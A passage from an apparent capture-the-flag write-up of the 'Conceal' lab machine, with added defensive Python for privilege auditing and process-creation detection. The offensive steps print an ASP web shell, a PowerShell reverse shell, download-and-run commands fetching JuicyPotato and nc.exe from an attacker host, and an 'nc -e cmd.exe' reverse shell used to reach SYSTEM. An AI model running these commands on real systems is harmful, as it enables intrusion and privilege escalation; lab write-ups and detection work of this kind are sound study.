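    return root


if __name__ == "__main__":
    sample = build_sample_upload_dir()
    for rel, why in sorted(scan_upload_dir(sample).items()):
        print(rel, "->", "; ".join(why))
```

Run against the real folder with `scan_upload_dir(r"C:\inetpub\wwwroot\upload")`. The durable fix is to stop serving the upload folder as a script-enabled directory (or to stop letting ftp write into the web root at all); the scanner only tells you whether that has already been abused.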

Upload it via ftp.

ftp> put shell.asp

If we browse to http://10.10.10.116/upload/shell.asp we see the output of the dir command.

Now, to get a shell, we'll use nishang's Invoke-PowerShellTcp.ps1 script, adding the following line at the end so the function is called when the file is run.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.38 -Port 6969

Modify the asp file to execute our PS script.

<%
Set oWSH = Server.CreateObject("WScript.Shell")
Call oWSH.Run ("cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\inetpub\wwwroot\upload\Invoke-PowerShellTcp.ps1", 0, True)
%>

Upload the PS script and the asp file via ftp.

ftp> put shell.asp
ftp> put Invoke-PowerShellTcp.ps1

Now, if we listen on the specified port and browse to http://10.10.10.116/upload/shell.asp, we get a PowerShell shell running as CONCEAL$.

root@kali:~/htb/conceal# nc -nlvp 6969
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6969
Ncat: Listening on 0.0.0.0:6969
Ncat: Connection from 10.10.10.116.
Ncat: Connection from 10.10.10.116:49675.
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>

On Destitute's desktop we find the user flag.

PS C:\Users\Destitute\Desktop> type proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

If we check the current user's privileges, we see SeImpersonatePrivilege is enabled.

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
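
The table above is exactly what a defender should be reviewing for every service and application-pool account, because the escalation that follows needs SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) in the token. As an added example (my own code, not from the write-up), here is a small Python parser for `whoami /priv` output that extracts the privilege table and reports the high-risk ones. SAMPLE_OUTPUT is the table printed above; the list of privileges treated as high risk is my own selection.

```python
"""Parse 'whoami /priv' output and flag token privileges worth attention.

Added example, not part of the original write-up. Impersonation-based
escalation needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege in
the token, so an audit of service and app-pool accounts should surface them.
SAMPLE_OUTPUT is the table from the page; HIGH_RISK is my own selection.
"""
import re

# Privileges whose presence in a low-trust service token is a known
# escalation path or is otherwise sensitive (my selection, not the page's).
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate a client token (Potato-style escalation)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token (Potato-style escalation)",
    "SeDebugPrivilege": "open any process",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# The whoami /priv output shown above, embedded so the script runs offline.
SAMPLE_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# One table row: name, free-text description, then the state column.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} for every row of a whoami /priv table."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def assess(privs):
    """Return [(name, state, why)] for each high-risk privilege in the token.

    A privilege that is present but Disabled still counts: a process can
    re-enable any privilege in its token with AdjustTokenPrivileges, so
    only privileges absent from the token are truly unavailable.
    """
    return [(name, state, HIGH_RISK[name])
            for name, state in privs.items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in assess(parse_privileges(SAMPLE_OUTPUT)):
        print(f"{name:<32} {state:<9} {why}")
```

For the token above this reports both SeImpersonatePrivilege (Enabled) and SeAssignPrimaryTokenPrivilege (Disabled). IIS application pools hold these by default, which is why hardening guidance focuses on keeping the worker process from being able to run arbitrary code in the first place rather than on removing the privilege.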

With this privilege enabled we should be able to escalate privileges via RottenPotato, but I tried and couldn't make it work, so I used Juicy Potato, which allows changing the COM server to abuse (the default is BITS).

First, we need to find a valid CLSID for this machine, so download the CLSID list for Windows 10 Enterprise, the test bat file and the JuicyPotato exe from GitHub and transfer them to Conceal.

PS C:\Users\Public> (New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/CLSID.list","C:\Users\Public\CLSID.list")
PS C:\Users\Public> (New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/test_clsid.bat","C:\Users\Public\test_clsid.bat")
PS C:\Users\Public> (New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/JuicyPotato.exe","C:\Users\Public\JuicyPotato.exe")

Now run the bat file, which checks which CLSIDs are valid on this machine.

PS C:\Users\Public> C:\Users\Public\test_clsid.bat

After a couple of minutes the output is written to result.log. From it we have to pick a CLSID whose COM server runs as NT AUTHORITY\SYSTEM.

PS C:\Users\Public> type result.log                   
{0289a7c5-91bf-4547-81ae-fec91a89dec5};CONCEAL\Destitute
{98068995-54d2-4136-9bc9-6dbcb0a4683f};CONCEAL\Destitute
{9acf41ed-d457-4cc1-941b-ab02c26e4686};CONCEAL\Destitute
{9678f47f-2435-475c-b24a-4606f8161c16};CONCEAL\Destitute
{417976B7-917D-4F1E-8F14-C18FCCB0B3A8};CONCEAL\Destitute
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM
{B441840A-5CEF-42F1-BE06-4E31A90E74D7};NT AUTHORITY\LOCAL SERVICE
{B7BC3EB9-B145-4574-B729-7D78126EB4C8};NT AUTHORITY\LOCAL SERVICE
{A8BE33B3-D275-459B-A853-A2150531C8B3};NT AUTHORITY\LOCAL SERVICE
{9694B5A2-54CE-4837-BA0A-F52FD7699F12};NT AUTHORITY\LOCAL SERVICE
{A0D76288-0FB2-477A-96F9-F7EFFD7ED5D3};NT AUTHORITY\LOCAL SERVICE
{CC9FA1A3-ADDE-49A9-B435-34CE6E5DA3DB};NT AUTHORITY\LOCAL SERVICE
{F1B75166-312C-4DC6-BA41-C2E2486C9913};NT AUTHORITY\LOCAL SERVICE
{F94358B1-E9AE-4D5C-AF66-CE50E67803C7};NT AUTHORITY\LOCAL SERVICE
{EA5EAA7B-1E81-4C76-BF2D-F2A867F764A1};NT AUTHORITY\LOCAL SERVICE
{DAB26424-5F5C-4834-8685-A4DB44DF8083};NT AUTHORITY\LOCAL SERVICE
{DF175E5E-5488-49B7-BCB9-B7204933E26F};NT AUTHORITY\LOCAL SERVICE
{4D098DC6-3080-4A11-9887-4C77FD7C2ED2};NT AUTHORITY\LOCAL SERVICE
{46B559E9-0D2F-44AC-9EE7-AE6D9384B292};NT AUTHORITY\LOCAL SERVICE
{557C6CBF-CD77-45CF-84E8-8F5A8A331BAD};NT AUTHORITY\LOCAL SERVICE
{37998346-3765-45B1-8C66-AA88CA6B20B8};NT AUTHORITY\LOCAL SERVICE
{206490E7-09B5-4C9D-8E54-254B87A5CEAF};NT AUTHORITY\LOCAL SERVICE
{1F3775BA-4FA2-4CA0-825F-5B9EC63C0029};NT AUTHORITY\LOCAL SERVICE
{235EB944-F722-47DB-8EE7-1EE27A8D4F98};NT AUTHORITY\LOCAL SERVICE
{21F282D1-A881-49E1-9A3A-26E44E39B86C};NT AUTHORITY\LOCAL SERVICE
{7ECB3DBE-742D-4B43-BF3E-2587BE1BFF72};NT AUTHORITY\LOCAL SERVICE
{770FDC97-76E7-4067-B14C-2DDB3A7517F2};NT AUTHORITY\LOCAL SERVICE
{8190FA8C-3A62-49FB-B145-071B4B74578D};NT AUTHORITY\LOCAL SERVICE
{7ECC8054-7AE3-486D-9CBA-8ED0B5ED61AC};NT AUTHORITY\LOCAL SERVICE
{754EC012-E0B0-4F32-A810-77F639CBF103};NT AUTHORITY\LOCAL SERVICE
{73978CED-828C-49AB-A403-9ABACDCE1505};NT AUTHORITY\LOCAL SERVICE
{680442B0-692A-465C-B47D-783C4EC5B6A2};NT AUTHORITY\LOCAL SERVICE
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
{42CBFAA7-A4A7-47BB-B422-BD10E9D02700};NT AUTHORITY\SYSTEM
{42C21DF5-FB58-4102-90E9-96A213DC7CE8};NT AUTHORITY\SYSTEM
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744};NT AUTHORITY\SYSTEM
{C63261E4-6052-41FF-B919-496FECF4C4E5};NT AUTHORITY\SYSTEM
{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\LOCAL SERVICE
{08D9DFDF-C6F7-404A-A20F-66EEC0A609CD};NT AUTHORITY\SYSTEM
{22f5b1df-7d7a-4d21-97f8-c21aefba859c};NT AUTHORITY\LOCAL SERVICE
{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\LOCAL SERVICE
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE
{581333F6-28DB-41BE-BC7A-FF201F12F3F6};NT AUTHORITY\LOCAL SERVICE
{47135eea-06b6-4452-8787-4a187c64a47e};NT AUTHORITY\SYSTEM
{687e55ca-6621-4c41-b9f1-c0eddc94bb05};NT AUTHORITY\SYSTEM
{B31118B2-1F49-48E5-B6F5-BC21CAEC56FB};NT AUTHORITY\SYSTEM
{6d8ff8e5-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{204810b9-73b2-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8e1-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8e7-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{2e5e84e9-4049-4244-b728-2d24227157c7};NT AUTHORITY\LOCAL SERVICE
{6d8ff8dd-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8df-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8d2-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8dc-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{0fb40f0d-1021-4022-8da0-aab0588dfc8b};NT AUTHORITY\LOCAL SERVICE
{B91D5831-B1BD-4608-8198-D72E155020F7};NT AUTHORITY\SYSTEM
{97061DF1-33AA-4B30-9A92-647546D943F3};NT AUTHORITY\SYSTEM
{8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\SYSTEM
{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\SYSTEM
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381};NT AUTHORITY\SYSTEM
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8};NT AUTHORITY\SYSTEM
{E63DE750-3BD7-4BE5-9C84-6B4281988C44};NT AUTHORITY\SYSTEM
{E48EDA45-43C6-48e0-9323-A7B2067D9CD5};NT AUTHORITY\SYSTEM
{A9B5F443-FE02-4C19-859D-E9B5C5A1B6C6};NT AUTHORITY\SYSTEM
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39};NT AUTHORITY\SYSTEM
{30766BD2-EA1C-4F28-BF27-0B44E2F68DB7};NT AUTHORITY\SYSTEM
{9E175B6D-F52A-11D8-B9A5-505054503030};NT AUTHORITY\SYSTEM
{9E175B68-F52A-11D8-B9A5-505054503030};NT AUTHORITY\SYSTEM
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
{0134A8B2-3407-4B45-AD25-E9F7C92A80BC};NT AUTHORITY\SYSTEM
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

We will make Juicy Potato execute a reverse shell with nc, but since it doesn't accept arguments for the program it launches, we wrap the command in the following bat script instead.

root@kali:~/htb/conceal# cat shell.bat 
@echo on
C:\Users\Public\nc.exe 10.10.16.38 6767 -e cmd.exe

Upload the nc.exe binary and the bat script to the machine.

(New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/nc.exe","C:\Users\Public\nc.exe")
(New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/shell.bat","C:\Users\Public\shell.bat")

Now we can run Juicy Potato with the bat script as the payload (-p), one of the NT AUTHORITY\SYSTEM CLSIDs in -c, -t * to try both CreateProcessWithTokenW and CreateProcessAsUser, and an arbitrary port to listen on in -l.

PS C:\Users\Public> C:\Users\Public\JuicyPotato.exe -l 1337 -p C:\Users\Public\shell.bat -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

If we're listening on the specified port we get a shell as nt authority\system.

root@kali:~/htb/conceal# nc -nlvp 6767
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6767
Ncat: Listening on 0.0.0.0:6767
Ncat: Connection from 10.10.10.116.
Ncat: Connection from 10.10.10.116:50777.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
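
Both stages of this box leave a recognisable shape in process-creation telemetry: first an IIS worker process spawning cmd.exe (the asp page), then a process running as NT AUTHORITY\SYSTEM whose parent was owned by the application-pool identity (the CreateProcessWithTokenW launch that Juicy Potato reports above). As an added example (my own code, not from the write-up or the JuicyPotato project), the following Python encodes those two rules and runs them over constructed events. The field names (image, parent_image, user, parent_user, cmdline) are my own simplified schema, not a specific product's; map them onto whatever your EDR or Sysmon event 1 records provide.

```python
"""Flag process-creation events matching the two steps of this write-up.

Added example, not from the original write-up. EVENTS are constructed
records, not real telemetry, and the field names are my own schema.
Rules:
  1. an IIS worker (w3wp.exe) spawning a shell or script host, which is
     what the uploaded ASP page does;
  2. a child running as NT AUTHORITY\SYSTEM whose parent ran as a service
     or application-pool identity, the shape a CreateProcessWithTokenW /
     CreateProcessAsUser launch from a low-privilege process leaves behind.
"""
import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
SYSTEM_ACCOUNT = "nt authority\\system"
# Built-in service accounts that should never be the parent of a SYSTEM child.
LOW_SERVICE_ACCOUNTS = {"nt authority\\local service", "nt authority\\network service"}


def base_name(image):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(image).lower()


def is_service_identity(user):
    """True for IIS app-pool identities, the built-in service accounts and
    machine accounts (the shell above reported itself as CONCEAL$)."""
    u = user.lower()
    return u.startswith("iis apppool\\") or u in LOW_SERVICE_ACCOUNTS or u.endswith("$")


def evaluate(event):
    """Return the names of the rules this event matches (empty if none)."""
    hits = []
    if base_name(event["parent_image"]) == "w3wp.exe" and base_name(event["image"]) in SHELLS:
        hits.append("iis_worker_spawned_shell")
    if event["user"].lower() == SYSTEM_ACCOUNT and is_service_identity(event["parent_user"]):
        hits.append("system_child_of_service_identity")
    return hits


def detect(events):
    """Return {event_index: [rule names]} for every event that fires a rule."""
    findings = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            findings[i] = hits
    return findings


# Constructed events modelled on the write-up's two steps; not real logs.
EVENTS = [
    {  # 0: shell.asp runs cmd.exe from inside the IIS worker
        "image": r"C:\Windows\SysWOW64\cmd.exe",
        "parent_image": r"C:\Windows\SysWOW64\inetsrv\w3wp.exe",
        "user": r"IIS APPPOOL\DefaultAppPool",
        "parent_user": r"IIS APPPOOL\DefaultAppPool",
        "cmdline": r"cmd.exe /c dir > C:\inetpub\wwwroot\upload\caca",
    },
    {  # 1: cmd.exe starting powershell.exe; parent is not w3wp, so rule 1 is silent
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
        "user": r"IIS APPPOOL\DefaultAppPool",
        "parent_user": r"IIS APPPOOL\DefaultAppPool",
        "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\inetpub\wwwroot\upload\Invoke-PowerShellTcp.ps1",
    },
    {  # 2: SYSTEM child of a process owned by the app-pool identity
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Users\Public\JuicyPotato.exe",
        "user": r"NT AUTHORITY\SYSTEM",
        "parent_user": r"IIS APPPOOL\DefaultAppPool",
        "cmdline": r"cmd.exe /c C:\Users\Public\shell.bat",
    },
    {  # 3: benign service start, SYSTEM parent and SYSTEM child
        "image": r"C:\Windows\System32\svchost.exe",
        "parent_image": r"C:\Windows\System32\services.exe",
        "user": r"NT AUTHORITY\SYSTEM",
        "parent_user": r"NT AUTHORITY\SYSTEM",
        "cmdline": r"svchost.exe -k netsvcs",
    },
]

if __name__ == "__main__":
    for idx, hits in detect(EVENTS).items():
        print(idx, EVENTS[idx]["image"], "->", ", ".join(hits))
```

Event 1 shows the limit of a one-level parent check: powershell.exe is two hops below w3wp.exe, so a production rule should walk the ancestry chain rather than only the direct parent. Rule 2 is the more valuable of the two because it is independent of which CLSID or payload was used; it only needs the parent's account to be recorded alongside the child's.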